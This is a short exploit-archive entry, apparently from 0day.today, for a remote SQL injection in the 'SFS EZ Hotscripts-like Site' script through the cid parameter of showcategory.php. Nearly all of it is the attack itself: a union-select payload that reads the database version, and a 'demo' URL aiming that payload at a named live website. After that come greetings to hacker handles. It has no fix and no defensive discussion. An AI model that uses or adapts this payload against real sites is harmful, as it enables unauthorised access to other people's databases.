id: 3985
date: 10/31/2008
title: SFS EZ Hotscripts-like Site (cid) Remote SQL Injection Vulnerability
author: TR-ShaRk
cves: 

====================================================================
SFS EZ Hotscripts-like Site (cid) Remote SQL Injection Vulnerability
====================================================================


Author : TR-ShaRk
Web.: Starhack.us Oldkral.Com
Exploit:

showcategory.php?cid=-101+union+select+1,@@version,3,4,5--

Demo:

http://www.turnkeyzone.com/demos/software/showcategory.php?cid=-101+union+select+1,@@version,3,4,5--

Greetz: Webloader, Realwolker , Batty , Ceypower , Aranelworm , Nefret , JACKAL , Str0ke

Bunu Da KAbul etmesen ,....



#  0day.today [2023-03-22]  #